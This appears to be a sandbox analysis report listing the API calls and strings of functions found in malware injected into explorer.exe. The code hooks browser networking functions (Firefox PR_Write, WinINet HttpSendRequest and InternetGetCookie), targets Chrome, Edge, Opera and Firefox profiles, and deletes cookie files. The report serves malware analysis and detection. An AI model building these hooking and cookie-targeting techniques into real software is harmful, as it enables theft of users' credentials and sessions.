Function 02CA3862 Relevance: 142.1, APIs: 54, Strings: 27, Instructions: 334
libraryloaderstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02CA3886
GetCurrentProcessId.KERNEL32(00000001), ref: 02CA389B
wsprintfA.USER32 ref: 02CA38B6

Part of subcall function 02CA118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02CA11A9
Part of subcall function 02CA118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02CA11C1
Part of subcall function 02CA118D: lstrlen.KERNEL32(?,00000000), ref: 02CA11C9
Part of subcall function 02CA118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02CA11D4
Part of subcall function 02CA118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02CA11EE
Part of subcall function 02CA118D: wsprintfA.USER32 ref: 02CA1205
Part of subcall function 02CA118D: CryptDestroyHash.ADVAPI32(?), ref: 02CA121E
Part of subcall function 02CA118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 02CA1228

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02CA38CD
GetLastError.KERNEL32 ref: 02CA38D3
RtlInitializeCriticalSection.NTDLL(02CA6038), ref: 02CA38F3
PathFindFileNameA.SHLWAPI(?), ref: 02CA38FA
lstrcat.KERNEL32(02CA5CDE,00000000), ref: 02CA3910
Sleep.KERNEL32(000001F4), ref: 02CA392A
lstrcmpiA.KERNEL32(00000000,firefox.exe), ref: 02CA393C
GetCommandLineW.KERNEL32(?), ref: 02CA394F
GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 02CA397E
GetProcAddress.KERNEL32(00000000), ref: 02CA3987
GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 02CA39AF
GetProcAddress.KERNEL32(00000000), ref: 02CA39B2
GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 02CA39C4
GetProcAddress.KERNEL32(00000000), ref: 02CA39C7
GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 02CA39E1
GetProcAddress.KERNEL32(00000000), ref: 02CA39E4
GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 02CA39EC
GetProcAddress.KERNEL32(00000000), ref: 02CA39EF
lstrcmpiA.KERNEL32(00000000,chrome.exe), ref: 02CA3A6D
GetCommandLineA.KERNEL32(NetworkService), ref: 02CA3A78
StrStrIA.SHLWAPI(00000000), ref: 02CA3A7B
lstrcmpiA.KERNEL32(00000000,opera.exe), ref: 02CA3A8E
GetCommandLineA.KERNEL32(NetworkService), ref: 02CA3A9D
StrStrIA.SHLWAPI(00000000), ref: 02CA3AA0
GetModuleHandleA.KERNEL32(opera.dll), ref: 02CA3ABF
GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 02CA3ACC
CommandLineToArgvW.SHELL32(00000000), ref: 02CA3956

Part of subcall function 02CA16C7: GetCurrentProcessId.KERNEL32 ref: 02CA16D9
Part of subcall function 02CA16C7: GetCurrentThreadId.KERNEL32 ref: 02CA16E1
Part of subcall function 02CA16C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02CA16F1
Part of subcall function 02CA16C7: Thread32First.KERNEL32(00000000,0000001C), ref: 02CA16FF
Part of subcall function 02CA16C7: CloseHandle.KERNEL32(00000000), ref: 02CA1758

lstrcmpiA.KERNEL32(00000000,iexplore.exe), ref: 02CA3A10
lstrcmpiA.KERNEL32(00000000,microsoftedgecp.exe), ref: 02CA3A20
lstrcmpiA.KERNEL32(00000000,msedge.exe), ref: 02CA3A30
GetCommandLineA.KERNEL32(NetworkService), ref: 02CA3A47
StrStrIA.SHLWAPI(00000000), ref: 02CA3A4A
GetModuleHandleA.KERNEL32(chrome.dll), ref: 02CA3A5F
GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 02CA3B2C
GetProcAddress.KERNEL32(00000000), ref: 02CA3B35
GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 02CA3B52
GetProcAddress.KERNEL32(00000000), ref: 02CA3B55
GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 02CA3B72
GetProcAddress.KERNEL32(00000000), ref: 02CA3B75
GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 02CA3B99
GetProcAddress.KERNEL32(00000000), ref: 02CA3B9C
GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 02CA3BA9
GetProcAddress.KERNEL32(00000000), ref: 02CA3BAC
GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 02CA3BB9
GetProcAddress.KERNEL32(00000000), ref: 02CA3BBC

Part of subcall function 02CA1C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 02CA1C42

RtlExitUserThread.NTDLL(00000000), ref: 02CA3BD9
wsprintfA.USER32 ref: 02CA3C1F
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA3C69
Process32First.KERNEL32(00000000,?), ref: 02CA3C88
CloseHandle.KERNELBASE(00000000), ref: 02CA3D77
Sleep.KERNELBASE(000003E8), ref: 02CA3D82

Strings

opera.dll, xrefs: 02CA3AB0
nss3.dll, xrefs: 02CA39B9, 02CA39C3, 02CA39EB
%s%s, xrefs: 02CA3C19
HttpSendRequestW, xrefs: 02CA3B4C
HttpQueryInfoA, xrefs: 02CA3B93
PR_Write, xrefs: 02CA39D6, 02CA39DB, 02CA39EA
VirtualQuery, xrefs: 02CA3974
msedge.exe, xrefs: 02CA3A2A
opera.exe, xrefs: 02CA3A88
fgclearcookies, xrefs: 02CA3C3D
InternetWriteFile, xrefs: 02CA3B6C
kernel32.dll, xrefs: 02CA3979
NetworkService, xrefs: 02CA3A42, 02CA3A73, 02CA3A98
chrome.dll, xrefs: 02CA3A81
microsoftedgecp.exe, xrefs: 02CA3A1A
firefox.exe, xrefs: 02CA3936
InternetQueryOptionA, xrefs: 02CA3B9E
InternetGetCookieA, xrefs: 02CA3BAE
nspr4.dll, xrefs: 02CA39AA, 02CA39DC
chrome.exe, xrefs: 02CA3A67
%s%d%d%d, xrefs: 02CA38B0
iexplore.exe, xrefs: 02CA3A0A
wininet.dll, xrefs: 02CA3B21, 02CA3B2B, 02CA3B51, 02CA3B71, 02CA3B98, 02CA3BA3, 02CA3BB3
msedge.dll, xrefs: 02CA3A50
PR_GetDescType, xrefs: 02CA39A4, 02CA39A9, 02CA39C2
HttpSendRequestA, xrefs: 02CA3B26
opera_browser.dll, xrefs: 02CA3AC7

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
API String ID: 2480436012-2618538661
Opcode ID: 8e1c5c3aa51098f9539297d6c59f6cb58e0bcaaf51b5e0f58cc0af8317590f11
Instruction ID: c77c6d4c5b10faf734a329d5eeb9450a869d497a8cc5c0e404adc7decf800bc8
Opcode Fuzzy Hash: 8e1c5c3aa51098f9539297d6c59f6cb58e0bcaaf51b5e0f58cc0af8317590f11
Instruction Fuzzy Hash: ABA1C670A80397ABE72477756C7AF2F3A9D9F80A4DB150A24F506E3140DBF4C9019BE5

Function 02CA15BE Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 87
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A

PathCombineW.SHLWAPI(00000000,00000000,*.*,74E2F770,00000000,75F0B2E0,76F183D0), ref: 02CA15EB
FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA15F7
lstrcmpiW.KERNEL32(?,02CA41C8), ref: 02CA1623
lstrcmpiW.KERNEL32(?,02CA41CC), ref: 02CA1633
PathCombineW.SHLWAPI(00000000,?,?), ref: 02CA164C
PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 02CA1661
PathCombineW.SHLWAPI(00000000,?,?), ref: 02CA167E
FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA169C
FindClose.KERNELBASE(00000000), ref: 02CA16AB

Strings

Cookies*, xrefs: 02CA165F
*.*, xrefs: 02CA15DE

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
String ID: *.*$Cookies*
API String ID: 4256701249-3228320225
Opcode ID: 8f8f32dcae7abe11c526c6985b8258b1888b8222a9a5157a1bf0d49403fee257
Instruction ID: d1f83f3c2a31874af709ed4b9952c6867cf0765c25809a421c940ad2068cb88d
Opcode Fuzzy Hash: 8f8f32dcae7abe11c526c6985b8258b1888b8222a9a5157a1bf0d49403fee257
Instruction Fuzzy Hash: 7721AB316043069BD314AB64DC55A7F77EDEBC939DF080A29F946E3240DBF4C9055BA2

Function 02CA14D8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 70
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CA13FE: wsprintfW.USER32 ref: 02CA142A
Part of subcall function 02CA13FE: FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA1439
Part of subcall function 02CA13FE: wsprintfW.USER32 ref: 02CA1476
Part of subcall function 02CA13FE: RemoveDirectoryW.KERNELBASE(00000000), ref: 02CA149C
Part of subcall function 02CA13FE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA14AF
Part of subcall function 02CA13FE: FindClose.KERNELBASE(00000000), ref: 02CA14BA

Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A

wsprintfW.USER32 ref: 02CA150D
FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA151C
wsprintfW.USER32 ref: 02CA1557
SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02CA156A
DeleteFileW.KERNELBASE(00000000), ref: 02CA1571
FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA1584
FindClose.KERNELBASE(00000000), ref: 02CA158F

Strings

%s%s, xrefs: 02CA1503, 02CA1551
*.*, xrefs: 02CA14FB

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
String ID: %s%s$*.*
API String ID: 2055899612-705776850
Opcode ID: f5e6159dfc614f1f8441c5e6a686e204198c774606e4b3d9b67180e5f4e71d92
Instruction ID: 2119652b58f4a82ec316f85c0f8e06feb96dd6c615299999bc4d9d64ab015534
Opcode Fuzzy Hash: f5e6159dfc614f1f8441c5e6a686e204198c774606e4b3d9b67180e5f4e71d92
Instruction Fuzzy Hash: 251136316003055BE324AB349C6AB6F3B9DEF8535CF040A28FE4693181DBF48A1596E6

Function 02CA13FE Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 69
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A

wsprintfW.USER32 ref: 02CA142A
FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA1439
wsprintfW.USER32 ref: 02CA1476

Part of subcall function 02CA14D8: wsprintfW.USER32 ref: 02CA150D
Part of subcall function 02CA14D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA151C
Part of subcall function 02CA14D8: wsprintfW.USER32 ref: 02CA1557
Part of subcall function 02CA14D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02CA156A
Part of subcall function 02CA14D8: DeleteFileW.KERNELBASE(00000000), ref: 02CA1571
Part of subcall function 02CA14D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA1584
Part of subcall function 02CA14D8: FindClose.KERNELBASE(00000000), ref: 02CA158F

RemoveDirectoryW.KERNELBASE(00000000), ref: 02CA149C
FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA14AF
FindClose.KERNELBASE(00000000), ref: 02CA14BA

Strings

%s%s, xrefs: 02CA1420
%s%s\, xrefs: 02CA1470
*.*, xrefs: 02CA1418

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
String ID: %s%s$%s%s\$*.*
API String ID: 2055899612-4093207852
Opcode ID: 7a1625632490d9e837c086e66c8559e40ccc32fcc44b98e075470c0cae10aef1
Instruction ID: 94726930ad3563d4c23b02885ec6fb35759bdf38d3fb7899d2435adfa1c15d1d
Opcode Fuzzy Hash: 7a1625632490d9e837c086e66c8559e40ccc32fcc44b98e075470c0cae10aef1
Instruction Fuzzy Hash: F31127306043425BE324AB28DC59B7F77DDEFD530DF080A2CFA4AA3181DBF4490596A2

Function 02CA3D8D Relevance: 4.5, APIs: 3, Instructions: 46
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CA1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CA1281

Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02CA3DAF
RtlMoveMemory.NTDLL(00000000,?,?), ref: 02CA3DE2
NtUnmapViewOfSection.NTDLL(000000FF), ref: 02CA3DEB

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
String ID:
API String ID: 4050682147-0
Opcode ID: fcbd49ddbe60821cc3116d17d1bac4002cd4860565fd1a65f1730be4ef1dee64
Instruction ID: 46c19acb439607706a353c2cdb95b0fca521b81577865394203e922229a331be
Opcode Fuzzy Hash: fcbd49ddbe60821cc3116d17d1bac4002cd4860565fd1a65f1730be4ef1dee64
Instruction Fuzzy Hash: E601F0309401C2DFCB28AB64D879B777B6DDF4131DF194A99E41687180C77A8691DFE0

Function 02CA2EA8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIA.KERNELBASE(chrome.exe|opera.exe|msedge.exe,?,00000000,?,02CA3CD2), ref: 02CA2EB4

Part of subcall function 02CA2E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,02CA2EC5), ref: 02CA2E27
Part of subcall function 02CA2E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 02CA2E52
Part of subcall function 02CA2E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 02CA2E7F
Part of subcall function 02CA2E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 02CA2E92

Strings

chrome.exe|opera.exe|msedge.exe, xrefs: 02CA2EAB

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: Process$InformationQuery$Open
String ID: chrome.exe|opera.exe|msedge.exe
API String ID: 4117927671-3743313796
Opcode ID: e4927e85d4adc78b3296ebc9625284535c167ccf6658d09afc23e522d5c6505d
Instruction ID: bd74bfe4e7f8d1cf506c4f0ec6767db3484718a99e86cc3ea75c29e748a84e76
Opcode Fuzzy Hash: e4927e85d4adc78b3296ebc9625284535c167ccf6658d09afc23e522d5c6505d
Instruction Fuzzy Hash: 6BD0A93230027207273C257A6C2992F958ECAC296A302023EE906D3200EA80CC4342E1

Function 02CA3709 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 73
stringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CA1363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA1374
Part of subcall function 02CA1363: Process32First.KERNEL32(00000000,?), ref: 02CA1393
Part of subcall function 02CA1363: CloseHandle.KERNELBASE(00000000), ref: 02CA13CB

Part of subcall function 02CA1363: lstrcmpiA.KERNEL32(?), ref: 02CA13A3
Part of subcall function 02CA1363: Process32Next.KERNEL32(00000000,00000128), ref: 02CA13C0

Sleep.KERNELBASE(000003E8,?,00000000,00000001,?,?,02CA3839,?,02CA3C53,00000001), ref: 02CA3731

Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,02CA3839,?,02CA3C53,00000001), ref: 02CA3752
lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\,?,00000000,00000001,?,?,02CA3839,?,02CA3C53,00000001), ref: 02CA3764

Part of subcall function 02CA15BE: PathCombineW.SHLWAPI(00000000,00000000,*.*,74E2F770,00000000,75F0B2E0,76F183D0), ref: 02CA15EB
Part of subcall function 02CA15BE: FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA15F7
Part of subcall function 02CA15BE: lstrcmpiW.KERNEL32(?,02CA41C8), ref: 02CA1623
Part of subcall function 02CA15BE: lstrcmpiW.KERNEL32(?,02CA41CC), ref: 02CA1633
Part of subcall function 02CA15BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 02CA164C
Part of subcall function 02CA15BE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA169C
Part of subcall function 02CA15BE: FindClose.KERNELBASE(00000000), ref: 02CA16AB

RtlZeroMemory.NTDLL(00000000,00001000), ref: 02CA377A
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,02CA3839,?,02CA3C53,00000001), ref: 02CA3783
lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\,?,00000000,00000001,?,?,02CA3839,?,02CA3C53,00000001), ref: 02CA378F
RtlZeroMemory.NTDLL(00000000,00001000), ref: 02CA37A3
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,00000001,?,?,02CA3839,?,02CA3C53,00000001), ref: 02CA37AC
lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\,?,00000000,00000001,?,?,02CA3839,?,02CA3C53,00000001), ref: 02CA37B8

Strings

Cookies*, xrefs: 02CA3766, 02CA3791, 02CA37BA
chrome.exe, xrefs: 02CA370E
msedge.exe, xrefs: 02CA3722
\Microsoft\Edge\User Data\, xrefs: 02CA3789
opera.exe, xrefs: 02CA3718
\Google\Chrome\User Data\, xrefs: 02CA375E
\Opera Software\Opera Stable\, xrefs: 02CA37B2

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
API String ID: 909495591-1175993956
Opcode ID: 78a0c505d9bb359c9ff8636396db3ccffa851cf8735e0e0620cfa3f33bcdcea4
Instruction ID: 0d83295f89c4609cb8ae80efdc55b72e033f516ac6c7eda428e6b1fe414f62bd
Opcode Fuzzy Hash: 78a0c505d9bb359c9ff8636396db3ccffa851cf8735e0e0620cfa3f33bcdcea4
Instruction Fuzzy Hash: 5F11C26038139622F538376A1CB2FAF654ECF95B9DF150114F20AAB6C0CEC49E0159A9

Function 02CA3BE1 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A

wsprintfA.USER32 ref: 02CA3C1F

Part of subcall function 02CA1235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02CA123F
Part of subcall function 02CA1235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,02CA3C33), ref: 02CA1251

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA3C69
Process32First.KERNEL32(00000000,?), ref: 02CA3C88
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 02CA3CA1
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 02CA3CB1
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02CA3CC1
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02CA3D12
Process32Next.KERNEL32(00000000,00000128), ref: 02CA3D68
CloseHandle.KERNELBASE(00000000), ref: 02CA3D77
Sleep.KERNELBASE(000003E8), ref: 02CA3D82

Part of subcall function 02CA1141: lstrlen.KERNEL32(?,?,?,00000000,?,02CA29DD,00000001), ref: 02CA1150
Part of subcall function 02CA1141: lstrlen.KERNEL32(:method POST,?,00000000,?,02CA29DD,00000001), ref: 02CA1155

Strings

microsoftedgecp.exe, xrefs: 02CA3A1A, 02CA3CB7, 02CA3D08
%s%s, xrefs: 02CA3C19
iexplore.exe, xrefs: 02CA3A0A, 02CA3CA7
firefox.exe, xrefs: 02CA3936, 02CA3C9B
fgclearcookies, xrefs: 02CA3C3D

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
API String ID: 2509890648-2554907557
Opcode ID: 448845339368bb5d6de2750a9ec7967d8aa833805a3040239fac4b5172c55f6e
Instruction ID: d6fb6f3a2b612e399ce96f42790702abf747f504c87c18cd575306385a8cb763
Opcode Fuzzy Hash: 448845339368bb5d6de2750a9ec7967d8aa833805a3040239fac4b5172c55f6e
Instruction Fuzzy Hash: CD411830A407439BDB28AB74DC75B7F73AEAF8474CF084B28F85693180DB60D9459AE5

Function 02CA35D4 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 64
stringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CA1363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA1374
Part of subcall function 02CA1363: Process32First.KERNEL32(00000000,?), ref: 02CA1393
Part of subcall function 02CA1363: CloseHandle.KERNELBASE(00000000), ref: 02CA13CB

Part of subcall function 02CA1363: lstrcmpiA.KERNEL32(?), ref: 02CA13A3
Part of subcall function 02CA1363: Process32Next.KERNEL32(00000000,00000128), ref: 02CA13C0

Sleep.KERNELBASE(000003E8,?,00000000,?,02CA382F,?,02CA3C53,00000001), ref: 02CA35FA

Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,?,02CA382F,?,02CA3C53,00000001), ref: 02CA3613
lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\,?,00000000,?,02CA382F,?,02CA3C53,00000001), ref: 02CA3623
wsprintfW.USER32 ref: 02CA3644

Part of subcall function 02CA14D8: wsprintfW.USER32 ref: 02CA150D
Part of subcall function 02CA14D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA151C
Part of subcall function 02CA14D8: wsprintfW.USER32 ref: 02CA1557
Part of subcall function 02CA14D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02CA156A
Part of subcall function 02CA14D8: DeleteFileW.KERNELBASE(00000000), ref: 02CA1571
Part of subcall function 02CA14D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA1584
Part of subcall function 02CA14D8: FindClose.KERNELBASE(00000000), ref: 02CA158F

Part of subcall function 02CA1011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02CA14CB), ref: 02CA1020
Part of subcall function 02CA1011: RtlFreeHeap.NTDLL(00000000), ref: 02CA1027

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000,?,00000000,?,02CA382F,?,02CA3C53,00000001), ref: 02CA3672
lstrcatW.KERNEL32(00000000,02CA4614,?,00000000,?,02CA382F,?,02CA3C53,00000001), ref: 02CA3682

Strings

%s%s, xrefs: 02CA363E
\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\, xrefs: 02CA361D
microsoftedge.exe, xrefs: 02CA35E1
microsoftedgecp.exe, xrefs: 02CA35EB
iexplore.exe, xrefs: 02CA35D7
*.*, xrefs: 02CA364D, 02CA368B

Memory Dump Source

Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd

Similarity

API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
API String ID: 2436889709-3669280581
Opcode ID: 42fc25a700c462b55ebe8695b2a7c7de0f6dfe9da86b82893b35286ab029bc22
Instruction ID: bd739cf5ea6d4919c688fe7994ed5490d6a7e1d3019e72e2d1286e77eb6c1e45
Opcode Fuzzy Hash: 42fc25a700c462b55ebe8695b2a7c7de0f6dfe9da86b82893b35286ab029bc22
Instruction Fuzzy Hash: DB11707078024267F73C27695CBAF7F265ADBD5B5EF190128B70ABB2C0DED4080166A9

Function 02CA36A1 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 37
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CA1363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA1374
Part of subcall function 02CA1363: Process32First.KERNEL32(00000000,?), ref: 02CA1393
Part of subcall function 02CA1363: CloseHandle.KERNELBASE(00000000), ref: 02CA13CB

Sleep.KERNELBASE(000003E8,?,00000000,?,02CA3834,?,02CA3C53,00000001), ref: 02CA36B3

Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,?,02CA3834,?,02CA3C53,00000001), ref: 02CA36CC
lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\,?,00000000,?,02CA3834,?,02CA3C53,00000001), ref: 02CA36DC

Part of subcall function 02CA14D8: wsprintfW.USER32 ref: 02CA150D
